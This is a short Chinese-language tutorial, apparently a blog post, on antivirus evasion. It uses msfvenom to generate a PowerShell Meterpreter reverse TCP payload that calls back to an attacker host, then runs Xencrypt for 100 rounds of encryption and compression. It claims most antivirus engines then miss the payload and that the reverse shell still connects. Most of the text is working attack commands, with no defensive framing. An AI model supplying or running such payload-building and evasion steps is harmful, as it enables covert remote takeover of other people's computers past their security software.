結合"PowerShell crypter"工具(下面用簡稱"crypter")來對powershell腳本進行加密並採用Gzip/DEFLATE來繞過殺軟
1、msfvenom生成powershell 反彈馬
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST= 192.168.81.253 LPORT=5555 -f psh-reflection > hackshark.ps1
通過檢測,發現依然有很多家殺軟報毒
2、採用"crypter"加密、壓縮處理ps反彈木馬
在powershell終端中輸入
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile .\hackshark.ps1 -OutFile hackhack.ps1 -Iterations 100
"-Iterations 100"是對腳本進行100次的加密與壓縮
經過100加密、壓縮後
已經實現大部分免殺了
也能成功反彈: